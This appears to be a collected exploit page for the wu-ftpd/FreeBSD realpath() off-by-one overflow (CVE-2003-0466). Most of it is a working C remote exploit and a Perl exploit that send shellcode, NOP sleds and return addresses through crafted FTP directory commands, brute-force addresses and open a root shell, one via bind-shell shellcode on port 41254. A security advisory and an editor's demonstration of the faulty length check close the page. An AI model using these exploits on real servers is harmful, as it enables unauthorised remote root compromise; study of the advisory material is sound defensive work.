	memset((char *)send_recv,(NRL),sizeof(send_recv));
	recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

	if(!strstr(send_recv,(FTP_USER_FAD)))
	{
		fprintf(stdout," [-] User id input failure.\n\n");
		close(sock);
		exit(FAD);
	}
	else fprintf(stdout," [+] User password input.\n");

	memset((char *)send_recv,(NRL),sizeof(send_recv));
	snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
	send(sock,send_recv,strlen(send_recv),(NRL));

	(u_int)sleep(SCS);
	memset((char *)send_recv,(NRL),sizeof(send_recv));
	recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

	if(strstr(send_recv,(FTP_LOGIN_FAD)))
	{
		fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
		close(sock);
		exit(FAD);
	}
	else if(strstr(send_recv,(FTP_LOGIN_SCS)))
	{
		fprintf(stdout," [*] User %s logged in.\n",user);
	}
	else
	{
		fprintf(stdout," [-] ftpd handshake failure.\n\n");
		close(sock);
		exit(FAD);
	}
	return;
}

int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
{
	int dr_n=(NRL),cmd_f=(NRL);
	char get_nm[(GET_R)];

	memset((char *)dir_nm,(NRL),(GET_R));
	/* MKD command */
	dir_nm[cmd_f++]=(0x4d);
	dir_nm[cmd_f++]=(0x4b);
	dir_nm[cmd_f++]=(0x44);
	dir_nm[cmd_f++]=(0x20);

	for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
	{
		dir_nm[dr_n]=(gb_character);
	}
	dir_nm[dr_n++]=(0x0d);
	dir_nm[dr_n++]=(0x0a);

	if(type)
	{
		send(sock,dir_nm,strlen(dir_nm),(NRL));
		(u_int)sleep(SCS);
		memset((char *)get_nm,(NRL),sizeof(get_nm));
		recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

	if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
		{
			fprintf(stdout," [-] MKD command failed.\n\n");
			exit(FAD);
		}
	}
	/* CMD command */
	cmd_f=(NRL);
	dir_nm[cmd_f++]=(0x43);
	dir_nm[cmd_f++]=(0x57);
	dir_nm[cmd_f++]=(0x44);

	send(sock,dir_nm,strlen(dir_nm),(NRL));
	(u_int)sleep(SCS);
	memset((char *)get_nm,(NRL),sizeof(get_nm));
	recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

	if(!strstr(get_nm,(CWD_COMM_SCS)))
	{
		fprintf(stdout," [-] CWD command failed.\n\n");
		exit(FAD);
	}
	return;
}

int send_shellcode(int sock,int type,char *dir_nm)
{
	int dr_n=(NRL),cmd_f=(NRL);
	char get_nm[(GET_R)];

	memset((char *)dir_nm,(NRL),(GET_R));
	/* MKD command */
	dir_nm[cmd_f++]=(0x4d);
	dir_nm[cmd_f++]=(0x4b);
	dir_nm[cmd_f++]=(0x44);
	dir_nm[cmd_f++]=(0x20);
	
	for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(plat[t_g].shellcode);dr_n++)
	{
		dir_nm[dr_n]=(DEF_NOP);
	}
	for(cmd_f=(NRL);cmd_f<strlen(plat[t_g].shellcode);cmd_f++)
	{
		dir_nm[dr_n++]=plat[t_g].shellcode[cmd_f];
	}
	dir_nm[dr_n++]=(0x0d);
	dir_nm[dr_n++]=(0x0a);

	if(type)
	{
		send(sock,dir_nm,strlen(dir_nm),(NRL));
		(u_int)sleep(SCS);
		memset((char *)get_nm,(NRL),sizeof(get_nm));
		recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

		if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
		{
			fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
			exit(FAD);
		}
	}
	/* CMD command */
	cmd_f=(NRL);
	dir_nm[cmd_f++]=(0x43);
	dir_nm[cmd_f++]=(0x57);
	dir_nm[cmd_f++]=(0x44);

	send(sock,dir_nm,strlen(dir_nm),(NRL));
	(u_int)sleep(SCS);
	memset((char *)get_nm,(NRL),sizeof(get_nm));
	recv(sock,get_nm,(GET_R)-1,(NRL));

	if(!strstr(get_nm,(CWD_COMM_SCS)))
	{
		fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
		exit(FAD);
	}
	return;
}

void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
	char atk_bf[(GET_R)];
	switch(t_g)
	{
		case 0:
		case 1:
		case 2:
		fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));	/* 01 */
		fprintf(stdout," [+] 02: make shell-code directory.\n");
		(int)send_shellcode(sock,d_type,(atk_bf));	/* 02 */
		fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));	/* 03 */
		fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44));	/* 04 */
		fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45));	/* 05 */
		fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46));	/* 06 */
		fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47));	/* 07 */
		fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48));	/* 08 */
		fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49));	/* 09 */
		fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50));	/* 10 */
		fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51));	/* 11 */
		fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52));	/* 12 */
		fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53));	/* 13 */
		fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54));	/* 14 */
		fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55));	/* 15 */
		(int)make_retloc(sock,type,(atk_bf),sh_addr);	/* 16 */
		break;
		case 3:
		case 4:
		case 5:
		case 6:
		case 7:
		case 8:
			fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));	/* 01 */
			fprintf(stdout," [+] 02: make shell-code directory.\n");
			(int)send_shellcode(sock,d_type,(atk_bf));	/* 02 */
			fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));	/* 03 */
			(int)make_retloc(sock,type,(atk_bf),sh_addr);	/* 04 */
			break;
	}
	if(type&&__exp_test)
	{
		__exp_test=(NRL);
		if(((int)check_exp(sock))==(FAD))
		{
			fprintf(stderr," [-] This isn't vulnerable.\n\n");
			exit(FAD);
		}
	}
	return;
}

int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
{
	int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
	char get_nm[(GET_R)];

	memset((char *)atk_bf,(NRL),(GET_R));
	if(type) /* MKD command */
	{
		atk_bf[cmd_f++]=(0x4d);
		atk_bf[cmd_f++]=(0x4b);
		atk_bf[cmd_f++]=(0x44);
		atk_bf[cmd_f++]=(0x20);
	}
	else /* RMD command */
	{
		atk_bf[cmd_f++]=(0x52);
		atk_bf[cmd_f++]=(0x4d);
		atk_bf[cmd_f++]=(0x44);
		atk_bf[cmd_f++]=(0x20);
	}
	for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(plat[t_g].off_st);r_rn_2++)
		atk_bf[r_rn_1++]=(0x41);
	{
		int chk_0xff=(NRL);
		switch(t_g)
		{
			case 0:
			case 1:
			case 2:
				/* frame pointer */
				*(long *)&atk_bf[r_rn_1]=0x82828282;
				r_rn_1+=(DEF_ALIGN);
				for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
				{
					if((sh_addr>>(chk_0xff)&0xff)==(0xff))
						atk_bf[r_rn_1++]=0xff;
					atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
				}
				break;
			case 3:
			case 4:
			case 5:
				/* frame pointer */
				*(long *)&atk_bf[r_rn_1]=0x82828282;
				r_rn_1+=(DEF_ALIGN);
				for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
				{
					if((sh_addr>>(chk_0xff)&0xff)==(0xff))
						atk_bf[r_rn_1++]=0xff;
					atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
				}
				for(r_rn_2=(NRL);r_rn_2<(DEF_ALIGN*10);r_rn_2++)
				{
					atk_bf[r_rn_1++]=(0x41);
				}
				break;
			case 6:
			case 7:
			case 8:
				for(r_rn_2=(NRL);r_rn_2<(DEF_ALIGN*10);r_rn_2++)
				{
					atk_bf[r_rn_1++]=(0x41);
				}
				/* frame pointer */
				*(long *)&atk_bf[r_rn_1]=0x82828282;
				r_rn_1+=(DEF_ALIGN);
				for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
				{
					if((sh_addr>>(chk_0xff)&0xff)==(0xff))
						atk_bf[r_rn_1++]=0xff;
					atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
				}
				break;
		}
		*(long *)&atk_bf[r_rn_1]=0x41414141;
		r_rn_1+=(DEF_ALIGN);
		*(long *)&atk_bf[r_rn_1]=0x0d414141;
		r_rn_1+=(DEF_ALIGN);
		atk_bf[r_rn_1++]=(0x0a);
	}
	send(sock,atk_bf,strlen(atk_bf),(NRL));
	(u_int)sleep(SCS);
	memset((char *)get_nm,(NRL),sizeof(get_nm));
	recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

	if(type) /* MKD command */
	{
		if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
		{
			fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
			exit(FAD);
		}
		else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
	}
	else /* RMD command */
	{
		if(!strstr(get_nm,(CWD_COMM_SCS)))
		{
			fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
			exit(FAD);
		}
		else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
	}
	return;
}

int main(int argc,char *argv[])
{
	int opt_g,sock,__bf=(NRL);
	int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
	char user_id[(DEF_VA)]=(DEF_STR);
	char pass_wd[(DEF_VA)]=(DEF_STR);
	char tg_host[(DEF_VA)]=(DEF_HOST);
	int tg_port=(DEF_PORT);
	u_long sh_addr=(plat[t_g].sh_addr);

	(void)banrl();
	while((opt_g=getopt(argc,argv,"QqCcM:m:H:h:U:u:P:p:N:n:S:s:T:t:B:b:Ii"))!=EOF)
	{
		extern char *optarg;
		switch(opt_g)
		{
			case 'Q':
			case 'q':
				fprintf(stdout," [*] Banner scan mode.\n");
				b_scan=(SCS);
				break;
				
			case 'C':
			case 'c':
				fprintf(stdout," [*] Check exploit test mode.\n");
				__exp_test=(SCS);
				break;

			case 'M':
			case 'm':
				mx_bf=(atoi(optarg));
				bf_lsz=((0x1000)/mx_bf);
				break;

			case 'H':
			case 'h':
				memset((char *)tg_host,(NRL),sizeof(tg_host));
				strncpy(tg_host,optarg,sizeof(tg_host)-1);
				break;
				
			case 'U':
			case 'u':
				memset((char *)user_id,(NRL),sizeof(user_id));
				strncpy(user_id,optarg,sizeof(user_id)-1);
				break;
				
			case 'P':
			case 'p':
				memset((char *)pass_wd,(NRL),sizeof(pass_wd));
				strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
				break;
				
			case 'N':
			case 'n':
				tg_port=(atoi(optarg));
				break;
				
			case 'S':
			case 's':
				sh_addr=strtoul(optarg,(NRL),(NRL));
				break;
				
			case 'T':
			case 't':
				if((t_g=(atoi(optarg)))<(9))
					sh_addr=(plat[t_g].sh_addr);
				else (void)prcode_usage(argv[(NRL)]);
				break;
				
			case 'B':
			case 'b':
				if((t_g=(atoi(optarg)))<(9))
				{
					sh_addr=(plat[t_g].bf_addr);
					__bf=(SCS);
				}
				else (void)prcode_usage(argv[(NRL)]);
				break;
				
			case 'I':
			case 'i':
				(void)prcode_usage(argv[(NRL)]);
				break;
				
			case '?':
				(void)prcode_usage(argv[(NRL)]);
				break;
		}
	}
	if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DEF_STR)))
		(void)prcode_usage(argv[(NRL)]);
	
	memset((char *)home_dir,(NRL),sizeof(home_dir));
	snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(plat[t_g].home),user_id);

	if(!__bf)
	{
		fprintf(stdout," [*] Target: %s.\n",(plat[t_g].v_nm));
		sh_addr=(u_long)null_chk(sh_addr);
		fprintf(stdout," [+] address: %p.\n",sh_addr);
		fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
		fflush(stdout);

		sock=(int)setsock(tg_host,tg_port);
		(void)re_connt(sock);
		fprintf(stdout," [ OK ]\n");

		fprintf(stdout," [1] ftpd connection login.\n");
		(void)ftpd_login(sock,user_id,pass_wd);

		fprintf(stdout," [2] send exploit code.\n");
		(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
		close(sock);

		fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
		fflush(stdout);

		sock=(int)setsock(tg_host,tg_port);
		(void)re_connt(sock);
		fprintf(stdout," [ OK ]\n");

		fprintf(stdout," [3] ftpd connection login.\n");
		(void)ftpd_login(sock,user_id,pass_wd);

		fprintf(stdout," [4] send exploit code.\n");
		(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));

		fprintf(stdout," [5] Waiting, execute the shell ");
		fflush(stdout);
		(u_int)sleep(SCS);
		
		fprintf(stdout,".");
		fflush(stdout);
		(u_int)sleep(SCS);
		
		fprintf(stdout,".");
		fflush(stdout);
		(u_int)sleep(SCS);

		fprintf(stdout,".\n");
		(void)conn_shell(sock,sh_addr);
		close(sock);
	}
	else
	{
		int bt_num=(NRL);
		fprintf(stdout," [*] Brute-Force mode.\n");
		fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
		fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);

		for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
		{
			sh_addr=(u_long)null_chk(sh_addr);
			fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
			fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
			fflush(stdout);
			
			sock=(int)setsock(tg_host,tg_port);
			(void)re_connt(sock);
			fprintf(stdout," [ OK ]\n");
			
			fprintf(stdout," [1] ftpd connection login.\n");
			(void)ftpd_login(sock,user_id,pass_wd);
			
			fprintf(stdout," [2] send exploit code.\n");
			if(bt_num==(NRL))
			{
				(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
			}
			else
			{
				(void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
			}
			close(sock);
			
			fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
			fflush(stdout);
			
			sock=(int)setsock(tg_host,tg_port);
			(void)re_connt(sock);
			fprintf(stdout," [ OK ]\n");
			
			fprintf(stdout," [3] ftpd connection login.\n");
			(void)ftpd_login(sock,user_id,pass_wd);
			
			fprintf(stdout," [4] send exploit code.\n");
			(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
			
			fprintf(stdout," [5] Waiting, execute the shell ");
			fflush(stdout);
			(u_int)sleep(SCS);

			fprintf(stdout,".");
			fflush(stdout);
			(u_int)sleep(SCS);
			
			fprintf(stdout,".");
			fflush(stdout);
			(u_int)sleep(SCS);
			
			fprintf(stdout,".\n");
			(void)conn_shell(sock,sh_addr);
			close(sock);

			sh_addr+=(bf_lsz);
		}
	}
	exit(NRL);
}

int setsock(char *u_host,int u_port)
{
	int sock;
	struct hostent *sxp;
	struct sockaddr_in sxp_addr;
 
	if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
	{
		return(FAD);
	}
	if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD))
	{
		return(FAD);
	}
	sxp_addr.sin_family=AF_INET;
	sxp_addr.sin_port=htons(u_port);
	sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
	bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));

	if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
	{
		return(FAD);
	}
	return(sock);
}

void conn_shell(int conn_sock,u_long scs_addr)
{
	int died;
	int ex_t=(NRL);
	char *command,readbuf[(GET_R)];
	fd_set rset;

	switch(t_g)
	{
		case 0:
		case 1:
		case 2:
		case 3:
		case 4:
		case 5:
			command=(DEF_COMM);
			break;
		case 6:
		case 7:
		case 8:
			command=(DEF_COMM_OB);
			break;
	}
	memset((char *)readbuf,(NRL),sizeof(readbuf));
	fprintf(stdout," [*] Send, command packet !\n\n");
	send(conn_sock,command,strlen(command),(NRL));

	for(;;)
	{
		fflush(stdout);
		FD_ZERO(&rset);
		FD_SET(conn_sock,&rset);
		FD_SET(STDIN_FILENO,&rset);
		select(conn_sock+1,&rset,NULL,NULL,NULL);

		if(FD_ISSET(conn_sock,&rset))
		{
			died=read(conn_sock,readbuf,sizeof(readbuf)-1);
			if(died<=(NRL))
			{
				if(!ex_t)
				{
					fprintf(stderr," [-] exploit failure.\n\n");
					return;
				}
				else
				{
	fprintf(stdout," [*] exploit successfully ! (&shellcode_addr: %p)\n\n",scs_addr);
					exit(NRL);
				}
			}
			readbuf[died]=(NRL);
			fprintf(stdout,"%s",readbuf);
		}
		if(FD_ISSET(STDIN_FILENO,&rset))
		{
			died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
			if(died>(NRL))
			{
				readbuf[died]=(NRL);
				if(strstr(readbuf,"exit"))
					ex_t=(SCS);
				write(conn_sock,readbuf,died);
			}
		}
	}
	return;
}

void re_connt(int st_sock_va)
{
	if(st_sock_va==(FAD))
	{
		fprintf(stdout," [ Fail ]\n\n");
		exit(FAD);
	}
}

void banrl()
{
	fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}

int check_exp(int sock)
{
	int conn_died;
	char gt_bf[(GET_R)];

	fprintf(stdout,"\n [+] Check exploit test ...\n");
	send(sock,"X82\r\n",strlen("X82\r\n"),(NRL)); /* test packet */
	(u_int)sleep(SCS);
	memset((char *)gt_bf,(NRL),sizeof(gt_bf));
	conn_died=read(sock,gt_bf,sizeof(gt_bf)-1);

	if(strstr(gt_bf,(CMD_ERROR)))
	{
		fprintf(stdout," [X] After test exploit, wu-ftpd is alive.\n");
		return(FAD);
	}
	else if(conn_died<=(NRL))
	{
		fprintf(stdout," [*] Ok, This is vulnerable version.\n\n");
		return(SCS);
	}
	else return(FAD);
}

/* eoc */		

- Vulnerability Information (22976)

freeBSD 4.8 realpath() Off-By-One Buffer Overflow Vulnerability (EDBID:22976)
freebsd remote
2003-07-31 Verified
0 daniels@legend.co.uk
N/A
source: http://www.securityfocus.com/bid/8315/info
  
The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has led to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack buffer overflow vulnerability is present in their libc. Other systems are also likely vulnerable.
  
Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions.
  
NOTE: Patching the C library alone may not remove all instances of this vulnerability. Statically linked programs may need to be rebuilt with a patched version of the C library. Also, some applications may implement their own version of 'realpath()'. These applications would require their own patches. FreeBSD has published a large list of applications that use 'realpath()'. Administrators of FreeBSD and other systems are urged to review it. For more information, see the advisory 'FreeBSD-SA-03:08.realpath'.

#!/usr/bin/perl

#realpath lukemftpd remote exploit for freeBSD 4.8
#i managed to code this, and lose the first copy, hence a re-write :(
#deadbeat,
#left without any return addresses/offsets purposely to stop kids using it..
#want the rets/offsets? heh..
#
#tested on freeBSD 4.8 and it worked ;) it worked ;)
#e: daniels@legend.co.uk
#e: deadbeat@sdf.lonestar.org

use IO::Socket;

$user = $ARGV[0];
$pass = $ARGV[1];
$ret = $ARGV[2];
$offset = $ARGV[3];
$host = $ARGV[4];
$buf= 1024;
$n = "./";
print "lukemftpd remote for FreeBSD 4.8 ..\n";
print "this is the kiddiot version, go grab them ret's+offsets..lool\n";
print "contact me and i might give u the rets/offsets\n";
if(!$ARGV[4]){
	die "Usage: perl $0 <user> <pass> <ret> <offset> <host>\n";
}
sub brute_force
{
	$r = $_[0];
	$o = $_[1];

		#shellcode from zillion.. from safemode.org...binds /bin/sh on 41254
	$hell =	"\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0".
        		"\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46".
        		"\x0a\xa1\x26\x89\x46\x0c\x6a\x10\x8d\x46\x08\x50\x52\x31\xc0".
        		"\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd\x80".
        		"\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff".
        		"\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01".
        		"\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff".
        		"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23";

	$addr = pack('l', ($r+$o));
	for($i=0;$i <$buf; $i +=4){
		$buffer .=$addr;
	}
	for($i=0;$i<$buf - length($hell) /2;$i++){
		$buffer .=$n;
	}
	$buffer .=$hell;

	print "Connecting to: $host\n";
	$sox = IO::Socket::INET->new(
		Proto=>"tcp",
		PeerPort=>"21",
		PeerAddr=>"$host"
	)or die "cant connect to $host ...maybe try a real host ;)\n";
	sleep 1;
	print ("[+]Trying addr: 0x", sprintf('%lx', ($r + $o)),"\n");
	print $sox "user $user\r\n";
	sleep 1;
	print "pass $pass\r\n";
	sleep 1;
	print $sox "MLST $buffer\r\n";
	sleep 2;
	close $sox;
	print "Trying to connect to r00tshell\n";
	$sox = IO::Socket::INET->new(
		Proto=>"tcp",
		PeerPort=>"41254",
		PeerAddr=>"$host"
	)or die"No r00tshell this time, try using a proper offset/ret_addr..\n";
	print "Wicked we got a r00tshell on $host : 41254\n\n";
	close $sox;
}

for($a=0;$a<1000;$a++){
	$offset++;
	$reta = pack('l', ($ret+$o));
	print "Brute Force [$a]\n";
	brute_force($reta,$offset);
}
		

- Vulnerability Information (F31479)

isec-0011-wu-ftpd.txt (PacketStormID:F31479)
2003-08-05 00:00:00
Wojciech Purczynski,Janusz Niewiadomski  
advisory,remote,local,root
CVE-2003-0466

wu-ftpd versions 2.5.0 to 2.6.2 have been found to be susceptible to an off-by-one bug in fb_realpath(). A local or remote attacker could exploit this vulnerability to gain root privileges on a vulnerable system.

Synopsis:	wu-ftpd fb_realpath() off-by-one bug
Product:	wu-ftpd
Version: 	2.5.0 <= 2.6.2
Vendor:		http://www.wuftpd.org/

URL:		http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
CVE:            http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0466
Author:		Wojciech Purczynski <cliph@isec.pl>
		Janusz Niewiadomski <funkysh@isec.pl>
Date:		July 31, 2003 


Issue:
======

The wu-ftpd FTP server contains a remotely exploitable off-by-one bug. A
local or remote attacker could exploit this vulnerability to gain root
privileges on a vulnerable system.


Details:
========

An off-by-one bug exists in the fb_realpath() function. An overflow occurs
when the length of a constructed path is equal to MAXPATHLEN+1 characters
while the buffer is only MAXPATHLEN characters in size. The overflowed
buffer lies on the stack.

The bug results from misuse of the rootd variable in the calculation of
the length of the concatenated string:

------8<------cut-here------8<------
    /*
     * Join the two strings together, ensuring that the right thing
     * happens if the last component is empty, or the dirname is root.
     */
    if (resolved[0] == '/' && resolved[1] == '\0')
        rootd = 1;
    else
        rootd = 0;

    if (*wbuf) {
        if (strlen(resolved) + strlen(wbuf) + rootd + 1 > MAXPATHLEN) {
            errno = ENAMETOOLONG;
            goto err1;
        }
        if (rootd == 0)
            (void) strcat(resolved, "/");
        (void) strcat(resolved, wbuf);
    }
------8<------cut-here------8<------

In the excerpt, rootd is 1 only when resolved is "/", which is exactly the
case in which no "/" separator is appended; the check therefore counts the
separator byte when none is needed and omits it when one is, so a path of
exactly MAXPATHLEN characters passes the check and its terminating NUL is
written one byte past the end of the buffer.

Since the path is constructed from the current working directory and a file
name given as a parameter to various FTP commands, an attacker needs to
create a deep directory structure to reach the required length.
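To make the arithmetic of that check concrete, here is an added example (this editor's code, not the advisory's or wu-ftpd's) that evaluates the excerpt's length check beside a corrected one and joins the two strings only when the result really fits; DEMO_MAXPATHLEN is a constructed stand-in of 16 for MAXPATHLEN, and rootd is computed exactly as the excerpt does.

```c
#include <stdio.h>
#include <string.h>

/* Small constructed stand-in for MAXPATHLEN so the arithmetic is easy to
 * follow (the real value is 1024 on BSD, PATH_MAX-derived on Linux). */
#define DEMO_MAXPATHLEN 16

/* rootd as the excerpt computes it: 1 only when resolved is exactly "/". */
static int is_rootd(const char *resolved)
{
    return resolved[0] == '/' && resolved[1] == '\0';
}

/* Bytes the joined string really occupies: resolved, a "/" separator when
 * resolved is not "/", wbuf, and the terminating NUL. */
size_t bytes_needed(const char *resolved, const char *wbuf)
{
    return strlen(resolved) + (is_rootd(resolved) ? 0 : 1) + strlen(wbuf) + 1;
}

/* The check as written in the excerpt. Returns 1 if the join is allowed.
 * rootd is added where the separator byte is NOT appended, and omitted
 * where it IS, so the non-root case comes out one byte short. */
int original_check_allows(const char *resolved, const char *wbuf, size_t maxpathlen)
{
    int rootd = is_rootd(resolved);
    return !(strlen(resolved) + strlen(wbuf) + rootd + 1 > maxpathlen);
}

/* Corrected check (this editor's formulation, not the vendor patch):
 * count the separator only when it will be written, and reserve the NUL. */
int corrected_check_allows(const char *resolved, const char *wbuf, size_t maxpathlen)
{
    return bytes_needed(resolved, wbuf) <= maxpathlen;
}

/* 1 when the original check lets through a join whose NUL terminator lands
 * at index maxpathlen, one byte past a buffer of maxpathlen bytes. */
int original_check_off_by_one(const char *resolved, const char *wbuf, size_t maxpathlen)
{
    return original_check_allows(resolved, wbuf, maxpathlen)
        && bytes_needed(resolved, wbuf) == maxpathlen + 1;
}

/* Join into buf (maxpathlen bytes) under the corrected check.
 * Returns 0 on success, -1 if the result would not fit. */
int safe_join(char *buf, size_t maxpathlen, const char *resolved, const char *wbuf)
{
    size_t n = strlen(resolved);

    if (!corrected_check_allows(resolved, wbuf, maxpathlen))
        return -1;
    memcpy(buf, resolved, n);
    if (!is_rootd(resolved))
        buf[n++] = '/';
    memcpy(buf + n, wbuf, strlen(wbuf) + 1);   /* copies the NUL; fits, checked above */
    return 0;
}

int main(void)
{
    /* constructed: 10 chars + "/" + 5 chars = 16 chars = DEMO_MAXPATHLEN,
     * so the NUL would be written at index 16 of a 16-byte buffer */
    const char *cwd = "/a/b/c/d/e";
    const char *name = "fghij";
    char buf[DEMO_MAXPATHLEN];

    printf("original check allows join: %d (needs %zu bytes, buffer has %d)\n",
           original_check_allows(cwd, name, DEMO_MAXPATHLEN),
           bytes_needed(cwd, name), DEMO_MAXPATHLEN);
    printf("off-by-one reachable:       %d\n",
           original_check_off_by_one(cwd, name, DEMO_MAXPATHLEN));
    printf("safe_join result:           %d\n",
           safe_join(buf, DEMO_MAXPATHLEN, cwd, name));

    /* the root case goes the other way: the original check rejects a path
     * that actually fits, because rootd adds a byte no separator uses */
    printf("root case, original check:  %d, corrected: %d\n",
           original_check_allows("/", "abcdefghijklmn", DEMO_MAXPATHLEN),
           corrected_check_allows("/", "abcdefghijklmn", DEMO_MAXPATHLEN));
    return 0;
}
```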

The following FTP commands may be used to cause the buffer overflow:

	STOR
	RETR
	APPE
	DELE
	MKD
	RMD
	STOU
	RNTO

This bug may be non-exploitable if the size of the buffer is greater than
MAXPATHLEN characters. This may occur, for example, if wu-ftpd is compiled
with some versions of the Linux kernel where PATH_MAX (and MAXPATHLEN
accordingly) is defined to be exactly 4095 characters. In such cases the
buffer is padded with an extra byte because of variable alignment, which
is a result of code optimization.

Linux 2.2.x and some early 2.4.x kernel versions define PATH_MAX to be
4095 characters, thus only wu-ftpd binaries compiled on 2.0.x or later 2.4.x
kernels are affected.


Exploit:
========

We investigated and successfully exploited this vulnerability on an x86 based
Linux system running a 2.4.19 kernel. We believe that exploitation of other
little-endian systems is also possible.
 

Impact:
=======

An authenticated local user or an anonymous FTP user with write access could
execute arbitrary code with root privileges.


Vendor Status:
==============

June  1, 2003	security@wu-ftpd.org has been notified
June  9, 2003	Request for confirmation of receipt sent to security@wu-ftpd.org
June 11, 2003	Response received from Kent Landfield
July  3, 2003   Request for status update sent
